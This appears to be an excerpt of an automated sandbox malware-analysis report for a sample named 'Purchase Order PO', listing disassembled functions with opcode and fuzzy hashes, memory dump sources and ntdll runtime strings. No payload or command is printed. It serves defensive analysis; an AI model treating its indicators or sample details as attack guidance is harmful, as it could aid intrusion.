                                                              • Opcode Fuzzy Hash: f04d162790448fc929e5a0e6d183d3fdf40dc4a537da56fa1e2fa4efbc7ab223
                                                              • Instruction Fuzzy Hash: 8E90022D21341012D2807158940860E001687D1342F99D427A0015568DCD19896A6321
                                                              Function 00FC2D00 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: caca9e4a3029e2c81da90500500db6ea91de8559ec0088e0d43fbc8b348f774f
                                                              • Instruction ID: c4bb1d0c237d1af702632cefca9fe3a874f99c123fd8ad3d44636dc608d6dfcf
                                                              • Opcode Fuzzy Hash: caca9e4a3029e2c81da90500500db6ea91de8559ec0088e0d43fbc8b348f774f
                                                              • Instruction Fuzzy Hash: D490022520545452D20075589408A0A001687D0345F59D023A10645A5ECA398952B131
                                                              Function 00FC2EE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5fa7a00c534c5385018108b5e914bd7b474115143f0077ab62c781ee97705be2
                                                              • Instruction ID: ba8d324ecdad2f38a9cfce8981ce650d968aefa4a6a488685d7a8e88856842e8
                                                              • Opcode Fuzzy Hash: 5fa7a00c534c5385018108b5e914bd7b474115143f0077ab62c781ee97705be2
                                                              • Instruction Fuzzy Hash: B290026520181413D2407558880460B001687D0342F59C023A2064565F8E2D8D527135
                                                              Function 00FC2EA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8660d5edb0ead01d0a9049753a3e352e85e8a14e4db34ccf288acd86606a8912
                                                              • Instruction ID: 54603870799e55608a254ced985d7ed87e8b0f59e62e803da2a1a3702f39913e
                                                              • Opcode Fuzzy Hash: 8660d5edb0ead01d0a9049753a3e352e85e8a14e4db34ccf288acd86606a8912
                                                              • Instruction Fuzzy Hash: ED90027520141412D2407158840474A001687D0341F59C023A5064564F8A5D8ED67665
                                                              Function 00FC2E80 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ec1d80c5239981a6a4ec5c0a464d0571b8ec5abe70fdec03dce285aa3b5eac13
                                                              • Instruction ID: 744b1c410247a9a1fe2768fc4a6f66d3045c14f582b76a3ca8ba10d6cb12e979
                                                              • Opcode Fuzzy Hash: ec1d80c5239981a6a4ec5c0a464d0571b8ec5abe70fdec03dce285aa3b5eac13
                                                              • Instruction Fuzzy Hash: B690022560141512D2017158840461A001B87D0381F99C033A1024565FCE298A93B131
                                                              Function 00FC2E30 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7dc060e4411c0d7d1442fd0b2e7faabbd439c5f93906a78345039556a19343ee
                                                              • Instruction ID: 524b3b6867cecca15794876cb6322616a9685865c5ef128add93af687f500101
                                                              • Opcode Fuzzy Hash: 7dc060e4411c0d7d1442fd0b2e7faabbd439c5f93906a78345039556a19343ee
                                                              • Instruction Fuzzy Hash: 6190022530141412D2027158841460A001AC7D1385F99C023E1424565E8A298A53B132
                                                              Function 00FC2FE0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc7f454d8b0556e254ca8e1d5b4ae97146a6f5c19ce6e948b1461a31ae52f17a
                                                              • Instruction ID: 85bd4777a6881446fecee19a8cde4fafcf2bae1cabc0e979319cdc36eee2f6bb
                                                              • Opcode Fuzzy Hash: cc7f454d8b0556e254ca8e1d5b4ae97146a6f5c19ce6e948b1461a31ae52f17a
                                                              • Instruction Fuzzy Hash: F3900225211C1052D30075688C14B0B001687D0343F59C127A0154564DCD1989626521
                                                              Function 00FC2FB0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7dfba6b82a993fd378b72d7b53e95bf05fcbbab179f434c1a241ebfaae1eb594
                                                              • Instruction ID: ece13df9627072bbb1568aadb4b53880bd0d0ed476f2219315127333f3b13be7
                                                              • Opcode Fuzzy Hash: 7dfba6b82a993fd378b72d7b53e95bf05fcbbab179f434c1a241ebfaae1eb594
                                                              • Instruction Fuzzy Hash: EC9002256014105242407168C84490A4016ABE1351759C133A0998560E895D89666665
                                                              Function 00FC2FA0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8c7e810c2e5c40e39acebe87a0c096e3a49cf61c6bda894be3cb8ea91240800f
                                                              • Instruction ID: 07925abd6dd7ba3055465b2c822d9d9c0fcdee2846703e597357f37e7f4d368d
                                                              • Opcode Fuzzy Hash: 8c7e810c2e5c40e39acebe87a0c096e3a49cf61c6bda894be3cb8ea91240800f
                                                              • Instruction Fuzzy Hash: EB90023520181412D2007158880874B001687D0342F59C023A5164565F8A69C9927531
                                                              Function 00FC2F90 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 566a1a0534f526ecaf8ea484f80df60de36bde914dec088006aa70dbf2288a7a
                                                              • Instruction ID: 3d6efd0ea7d404034851dc04be4116c64d93d01deeae2724c0d3deb8bd1c71cd
                                                              • Opcode Fuzzy Hash: 566a1a0534f526ecaf8ea484f80df60de36bde914dec088006aa70dbf2288a7a
                                                              • Instruction Fuzzy Hash: A390023520181412D2007158881470F001687D0342F59C023A1164565E8A2989527571
                                                              Function 00FC2F60 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 93230335fdce1d939042562ca75d0c1965e0e4606836d684535d8266788db4b4
                                                              • Instruction ID: 1f60aa6d85ea6d6594d1491c63de9dac3d70e045d10d04c759abf8778b3511bd
                                                              • Opcode Fuzzy Hash: 93230335fdce1d939042562ca75d0c1965e0e4606836d684535d8266788db4b4
                                                              • Instruction Fuzzy Hash: FA90026521141052D2047158840470A005687E1341F59C023A2154564DC92D8D626125
                                                              Function 00FC2F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1674e22c153ce59c2d973bcacbf2d617057546d7f3d1790a0a555b0740665603
                                                              • Instruction ID: 454b85415ff11b901ac8c4dba327a5f51aaf1da18125c07d341a86bf7e1972c3
                                                              • Opcode Fuzzy Hash: 1674e22c153ce59c2d973bcacbf2d617057546d7f3d1790a0a555b0740665603
                                                              • Instruction Fuzzy Hash: DB90026534141452D20071588414B0A0016C7E1341F59C027E1064564E8A1DCD537126
                                                              Function 00FC3090 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6c5025f0ac5d223edf51dc064e0351cde8883ee2c4f4fb879b6c0c59af7dcad
                                                              • Instruction ID: 7afdf0fe19b14b6465a1401a52f76d96c87779677c8eb7fb9b9cc9b801441a7d
                                                              • Opcode Fuzzy Hash: c6c5025f0ac5d223edf51dc064e0351cde8883ee2c4f4fb879b6c0c59af7dcad
                                                              • Instruction Fuzzy Hash: BB90022524141812D2407158C41470B0017C7D0741F59C023A0024564E8A1A8A6676B1
                                                              Function 00FC3010 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ad3046394f4b813ba853b591a1913dd04e6ab12321f042d5d84b4529ca85808
                                                              • Instruction ID: c4f5e6ed8c8d1257c183f265237678919b8b9da30f6ada247e3bcca06ee4590b
                                                              • Opcode Fuzzy Hash: 3ad3046394f4b813ba853b591a1913dd04e6ab12321f042d5d84b4529ca85808
                                                              • Instruction Fuzzy Hash: D490022520185452D24072588804B0F411687E1342F99C02BA4156564DCD1989566721
                                                              Function 00FC39B0 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08c02a5abb593d35e3eabe52d27c6e510ff51dd747b6772942386c9bb9b0d874
                                                              • Instruction ID: 11f0cba854c0f093606e66c94152e811797452c82a0179109917ea538fd9edf8
                                                              • Opcode Fuzzy Hash: 08c02a5abb593d35e3eabe52d27c6e510ff51dd747b6772942386c9bb9b0d874
                                                              • Instruction Fuzzy Hash: 1590022524546112D250715C840461A4016A7E0341F59C033A08145A4E895989567221
                                                              Function 00FC3D70 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 64f65c330596893f86fd978958873198da8b9521982c1abfc5f1189f22f0dee7
                                                              • Instruction ID: 99e409565418121e25b09e591c514fb37ef95d1c79dfc22114c3f8714485f6ab
                                                              • Opcode Fuzzy Hash: 64f65c330596893f86fd978958873198da8b9521982c1abfc5f1189f22f0dee7
                                                              • Instruction Fuzzy Hash: D490023920141412D6107158980464A005787D0341F59D423A0424568E8A5889A2B121
                                                              Function 00FC3D10 Relevance: .0, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cbfb45ee2a5887c253b0d11f8b395aa0858d34ae97f4deddbca0a5cb152bf336
                                                              • Instruction ID: 89d9f0b693f8847f289cd444934dc9e1cd1a97f5a761f8dec24f3084750404a8
                                                              • Opcode Fuzzy Hash: cbfb45ee2a5887c253b0d11f8b395aa0858d34ae97f4deddbca0a5cb152bf336
                                                              • Instruction Fuzzy Hash: A290023520241152964072589804A4E411687E1342B99D427A0015564DCD1889626221
                                                              Function 00FC2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction ID: 55b2ce71a6a5333b2eb95c94062ae8f845fbe297c4ceffad56831f9a21db9b0c
                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                              • Instruction Fuzzy Hash:
                                                              Function 00FC2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 8d0ef5e7fe3c846d9d5105277fbb002f2fcbafd22a6186be60aeffdb879f5acd
                                                              • Instruction ID: 3ce73757f2b73a99af0f85f8445364317a75f8d3971e2ceecb33afe2454528d8
                                                              • Opcode Fuzzy Hash: 8d0ef5e7fe3c846d9d5105277fbb002f2fcbafd22a6186be60aeffdb879f5acd
                                                              • Instruction Fuzzy Hash: 4851C4B6A00117BBCB50DB988D91A7EF7B8FB08300B18816AE559D7681D634DE04B7A1
                                                              Function 01032410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 41aa51b988c922f0fb36cdbb799d3eb3c335d2c96742842e0ea0bdbdaea6790f
                                                              • Instruction ID: bb622dd37f7caab93f0affdb04f5677507f1d0a87b53bad6fa71a4fa97b45edc
                                                              • Opcode Fuzzy Hash: 41aa51b988c922f0fb36cdbb799d3eb3c335d2c96742842e0ea0bdbdaea6790f
                                                              • Instruction Fuzzy Hash: 5451F571A00645AECB70DE5CC89097EBBFDEF84300B44846AE5D6C7682EA74EB409B61
                                                              Function 00FB7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00FF46FC
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00FF4655
                                                              • Execute=1, xrefs: 00FF4713
                                                              • ExecuteOptions, xrefs: 00FF46A0
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 00FF4787
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00FF4742
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00FF4725
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 0-484625025
                                                              • Opcode ID: bedbb6542b951d2edf7807179eb1b3ac2e1c5003255e9d5dd30b541b1dfc899a
                                                              • Instruction ID: 925db08c93d21978fea091031fedb855719e2d644e356e074b6ac0ef877535f8
                                                              • Opcode Fuzzy Hash: bedbb6542b951d2edf7807179eb1b3ac2e1c5003255e9d5dd30b541b1dfc899a
                                                              • Instruction Fuzzy Hash: C4513931A0431D6ADF20BA65DC86FFE73B9AF54310F1400A9E505A71D1EB71AE41BF51
                                                              Function 00FCB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-$0$0
                                                              • API String ID: 1302938615-699404926
                                                              • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction ID: 3ee5a719c4537ddc0be857907b5709a0cb029ba1601e4dc7ba41ecbc9b4759b8
                                                              • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                              • Instruction Fuzzy Hash: FE81B078E0524B9ADF288E68CA53FFEBBB5AF85320F18425DD851A72D1C7349C41EB50
                                                              Function 010320E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$[$]:%u
                                                              • API String ID: 48624451-2819853543
                                                              • Opcode ID: 7ba2c8b0a4c61c6dfb846a2a23d537a0dc1ff7bcede2e10b71d1ec998d1ff0b0
                                                              • Instruction ID: 4b5a76428db4b0aa84464a1b55fd0607a10e0d5b6a9104b94c5825a802711999
                                                              • Opcode Fuzzy Hash: 7ba2c8b0a4c61c6dfb846a2a23d537a0dc1ff7bcede2e10b71d1ec998d1ff0b0
                                                              • Instruction Fuzzy Hash: 8C21A37AA00119ABDB10DE68CD51EEEBBFCEF94740F040156E944E3201EB30DA019BA1
                                                              Function 00FAF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00FF02E7
                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00FF02BD
                                                              • RTL: Re-Waiting, xrefs: 00FF031E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                              • API String ID: 0-2474120054
                                                              • Opcode ID: b9ceee1cdca7ecee0681507a56c63ce828362a92f5ed3e0f9c5e40167b0173f8
                                                              • Instruction ID: 4fce3965bf5304e551607a0bd119da61db77c47b71a8e93b79334ca17a66ac05
                                                              • Opcode Fuzzy Hash: b9ceee1cdca7ecee0681507a56c63ce828362a92f5ed3e0f9c5e40167b0173f8
                                                              • Instruction Fuzzy Hash: EBE1E271A047419FD724CF68C885B2AB7E0BF85324F240A2DF5958B2E1DB74D849EB52
                                                              Function 00FBBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00FF7B7F
                                                              • RTL: Re-Waiting, xrefs: 00FF7BAC
                                                              • RTL: Resource at %p, xrefs: 00FF7B8E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 0-871070163
                                                              • Opcode ID: b1712d87a1eeb5069938aadbb01fcf07b9dc6cbd9368ee5b06ab1fc71219bd9a
                                                              • Instruction ID: 38d47b216abdf072fd051f89e31f26df86d0390559d92b7cc2dd381bb0ef988e
                                                              • Opcode Fuzzy Hash: b1712d87a1eeb5069938aadbb01fcf07b9dc6cbd9368ee5b06ab1fc71219bd9a
                                                              • Instruction Fuzzy Hash: 7741D1317047079FD720DE26CC41BAAB7E5EF89720F100A1DF9969B290DBB1E805AF91
                                                              Function 00FBB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FF728C
                                                              Strings
                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 00FF7294
                                                              • RTL: Re-Waiting, xrefs: 00FF72C1
                                                              • RTL: Resource at %p, xrefs: 00FF72A3
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                              • API String ID: 885266447-605551621
                                                              • Opcode ID: 1b205bea23a3069e8fc55c88469a222262a39c876f6907c3cdd6389ddcbe088c
                                                              • Instruction ID: e3194258d451f4903f4d01177294bbd07c0cf043a18da1b6de73ec861a9245a6
                                                              • Opcode Fuzzy Hash: 1b205bea23a3069e8fc55c88469a222262a39c876f6907c3cdd6389ddcbe088c
                                                              • Instruction Fuzzy Hash: 1F410532B04306ABD720EE25CC41FAAB7A5FF54720F140619F955D7281DB60F802ABD1
                                                              Function 01032300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: %%%u$]:%u
                                                              • API String ID: 48624451-3050659472
                                                              • Opcode ID: b2813c81d89e584f4cadca09960465cb0412cd0c5ffcb0a50c08860baa140326
                                                              • Instruction ID: 05e7815411a177c5e89f2726324cd8670e3bdb34a3cfa1487d864ffa9c685514
                                                              • Opcode Fuzzy Hash: b2813c81d89e584f4cadca09960465cb0412cd0c5ffcb0a50c08860baa140326
                                                              • Instruction Fuzzy Hash: 1A318472A00219AFDB60DE29DC41BEE77FCEB44610F454596E989E3241EB30AA449BA1
                                                              Function 00FC7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm
                                                              • String ID: +$-
                                                              • API String ID: 1302938615-2137968064
                                                              • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction ID: fcec2f58ce7413219321f9bb09a084412db1c6d12c982fff6a5febdba5034458
                                                              • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                              • Instruction Fuzzy Hash: 0C91A371E083079ADB24EE69CA82FBEB7A5AF44370F24451EE855A72C0D7309D41EF50
                                                              Function 00F89126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2438615849.0000000000F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f50000_Purchase Order PO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $$@
                                                              • API String ID: 0-1194432280
                                                              • Opcode ID: 6e65e2edcef35d82db1291f5687124f178c431d4394c5aea7bc1fabebac039a4
                                                              • Instruction ID: 35759746247822bdb5b0d076b66f97dd429d1f0dac31ab380c0a93e18346c5d7
                                                              • Opcode Fuzzy Hash: 6e65e2edcef35d82db1291f5687124f178c431d4394c5aea7bc1fabebac039a4
                                                              • Instruction Fuzzy Hash: F6813B72D046699BDB31DB54CC45BEEB7B8AF08710F0441EAA909B7280E7759E80DFA0

                                                              Execution Graph

                                                              Execution Coverage:2.7%
                                                              Dynamic/Decrypted Code Coverage:4.4%
                                                              Signature Coverage:1.6%
                                                              Total number of Nodes:436
                                                              Total number of Limit Nodes:71
